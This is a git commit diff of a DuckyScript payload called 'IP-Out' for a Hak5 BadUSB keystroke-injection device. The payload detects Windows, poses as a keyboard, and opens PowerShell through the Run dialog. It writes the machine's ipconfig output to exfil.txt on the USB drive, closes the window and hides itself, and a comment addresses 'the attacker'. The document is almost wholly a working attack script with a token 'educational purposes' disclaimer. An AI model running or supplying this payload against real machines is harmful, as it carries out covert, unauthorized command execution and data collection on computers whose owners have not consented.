Update payload.txt
Mavis Coffey
GitHub
parent
d9baab6395
commit
0f85a6936e
|
|
@ -2,20 +2,59 @@ REM Title: IP-Out
|
|||
REM Author: Mavisinator30001
|
||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||
REM Target: Any Windows System
|
||||
REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
DEFINE #DRIVELABEL D
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRING Powershell
|
||||
ENTER
|
||||
STRINGLN Powershell
|
||||
DELAY 1000
|
||||
STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
|
||||
ENTER
|
||||
STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ATTACKMODE OFF
|
||||
REM And should the attacker want to make sure the payload was successful:
|
||||
WAIT_FOR_BUTTON_PRESS
|
||||
ATTACKMODE STORAGE
|
||||
HIDE_PAYLOAD
|
||||
|
|
|
|||
Loading…
Reference in New Issue